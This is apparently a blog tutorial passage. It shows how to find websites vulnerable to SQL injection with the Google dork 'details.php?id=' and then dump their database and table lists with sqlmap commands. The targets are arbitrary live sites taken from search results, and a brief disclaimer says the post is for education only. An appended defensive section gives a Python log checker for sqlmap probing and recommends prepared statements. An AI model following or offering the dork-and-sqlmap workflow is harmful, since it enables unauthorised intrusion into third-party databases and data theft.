Open your preferred web browser (I’m using Firefox).
Navigate to www.google.com. Copy and paste the following dork into the search bar: details.php?id=. The search results will display websites with details.php?id= in their URLs. Open each site individually and verify that the dork is present in their URLs.
Step 2:
Now that we have identified potentially vulnerable sites using Google dorks, we can proceed to test them for SQL injection using a tool called sqlmap. sqlmap ships with Kali Linux; however, if you don’t have it, you can install it by running the following command:
sudo apt install sqlmap
Once the installation is complete, run the following command to find SQL injection vulnerabilities using sqlmap:
sqlmap -u "put_the_URL_of_the_site_here" --dbs
Sqlmap will test each parameter in the URL for SQL injection and provide the database type along with a list of databases.
Step 3:
Once the SQL injection vulnerability has been successfully identified and exploited, you can use additional sqlmap flags to learn more about the underlying database, e.g. which databases are present and the number of tables they have.
For example:
To find the number of tables in a specific database, use the command:
sqlmap -u "<URL of the site>" -D <database name> --tables
To determine the names of the columns in a particular table, use:
By following these steps, you will be able to leverage Google dorks and sqlmap to identify and exploit SQL injection vulnerabilities, gaining access to the underlying databases and extracting valuable information. However, it’s crucial to note that performing these actions on websites without permission is illegal and unethical. This blog post aims to provide knowledge and raise awareness about SQL injection vulnerabilities for educational purposes only.
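The probing described in Steps 2 and 3 is visible in the target's web server access log, so a site owner can check for it. The following is an added example, not part of the original post: a small Python log check that flags clients sending sqlmap's default User-Agent or a non-numeric value in the id parameter. It assumes the Apache/nginx "combined" log format and an application whose ids are always numeric; the log lines, IP addresses and the sqlmap version string are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" access-log format (not real traffic).
# The sqlmap version in the User-Agent is a made-up placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:10:00:01 +0000] "GET /details.php?id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/123.0"
198.51.100.9 - - [10/Mar/2024:10:00:02 +0000] "GET /details.php?id=7%27 HTTP/1.1" 500 310 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
192.0.2.44 - - [10/Mar/2024:10:00:09 +0000] "GET /details.php?id=7%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/122.0"
203.0.113.5 - - [10/Mar/2024:10:00:11 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/123.0"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def find_probes(log_text, param="id"):
    """Return {client_ip: set of reasons} for requests that look like SQLi probing."""
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        # sqlmap identifies itself by default; the header can be changed, so
        # this is a cheap first signal rather than a complete one.
        if m["ua"].lower().startswith("sqlmap/"):
            findings[m["ip"]].add("sqlmap user-agent")
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for value in query.get(param, []):
            # Assumption: the application only issues numeric ids, so anything
            # else in this parameter is tampering, whatever the payload is.
            if not re.fullmatch(r"[0-9]+", value):
                findings[m["ip"]].add("non-numeric " + param)
    return dict(findings)

if __name__ == "__main__":
    for ip, reasons in sorted(find_probes(SAMPLE_LOG).items()):
        print(ip, sorted(reasons))
```

Detection only shows that probing happened. The durable fix is in the application: bind id as a parameter in a prepared statement and reject non-integer values before the query is built.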